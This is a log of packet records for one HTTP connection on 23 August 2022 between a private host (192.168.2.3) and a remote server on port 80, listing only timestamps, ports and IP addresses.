Aug 23, 2022 18:25:29.212595940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212622881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212646961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212672949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212697029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212721109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212743998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212768078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212791920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212816000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212841988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212865114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212888956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212913990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212938070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212960958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215003014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215090036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215116024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215142012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215168953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215193987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215215921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215240955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215267897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215291023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215315104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215337992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215387106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215409994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215431929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215455055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215478897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.215506077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.216219902 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.217101097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.217892885 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.217920065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.217953920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.217978001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218002081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218024969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218039036 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218050957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218075991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218101025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218123913 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218132019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218154907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218178034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218202114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218221903 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218228102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218250990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218272924 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218275070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218298912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218322992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218333006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218347073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218370914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218393087 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218445063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218450069 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218467951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218502045 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218570948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218581915 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218631029 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218710899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218713999 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218735933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218744040 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218764067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218791008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218802929 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218823910 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218842030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218878984 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218902111 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.218955994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.218981028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219116926 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219141006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219162941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219187975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219274998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219341993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219408035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219434977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219532967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219592094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219616890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219713926 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219738007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219845057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219867945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219892025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.219971895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220031977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220057011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220089912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220164061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220187902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220213890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220237970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220258951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220279932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220304012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220326900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220349073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220370054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220392942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220416069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220438957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220463037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.220546961 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.222371101 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.222421885 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.222485065 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.253686905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.253731966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255664110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255757093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255763054 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.255785942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255795002 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.255811930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255836010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255842924 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.255856037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255882978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255908012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255933046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255955935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.255980968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256006956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256030083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256047964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256073952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256098986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256122112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256146908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256170034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256194115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256221056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256246090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256269932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256295919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256315947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256339073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256360054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256381989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256427050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256460905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256479979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256500006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256520033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256542921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256565094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256586075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256606102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256640911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256664991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256688118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256712914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256753922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256781101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256808043 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256834984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256860018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256881952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256906986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256931067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256957054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.256983042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257009983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257035017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257061958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257096052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257121086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257143974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257195950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257219076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257245064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257267952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257292986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257317066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257339954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257365942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257412910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257436037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257461071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257483959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257505894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257529020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257554054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257576942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257601976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257625103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257651091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257675886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257698059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257720947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257745981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257769108 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257791042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257813931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257838964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257868052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.257894993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257911921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.257917881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257941008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257949114 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.257963896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.257975101 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.257986069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258002996 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258013010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258034945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258059025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258060932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258104086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258124113 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258147955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258172989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258197069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258219957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258246899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258279085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258290052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258302927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258326054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258348942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258352995 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258372068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258383989 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258397102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258409023 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258419991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258439064 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258444071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258470058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258471012 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258491993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258492947 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258517027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258538008 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258541107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258553982 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258563995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258588076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258589983 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258610964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258621931 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258636951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258645058 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258662939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258667946 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258686066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258711100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258713961 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258733988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258757114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258768082 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258780003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258790016 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258802891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258824110 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258827925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258853912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258861065 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258877993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258902073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258904934 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258928061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258939028 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.258950949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258975029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.258997917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259010077 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259021044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259046078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259052038 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259068966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259076118 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259093046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259116888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259118080 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259139061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259164095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259164095 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259186983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259192944 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259212017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259227991 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259238005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259253025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259263039 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259274960 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259287119 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259299994 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259310961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259321928 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259335995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259345055 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259376049 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259377956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259392023 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259402037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259416103 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259423971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259437084 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259448051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259462118 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259471893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259481907 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259494066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259504080 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259515047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259536982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259540081 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259557962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259563923 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259581089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259582996 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259624958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259629011 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259648085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259663105 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259670973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259687901 CEST	49943	80	192.168.2.3	88.198.122.116
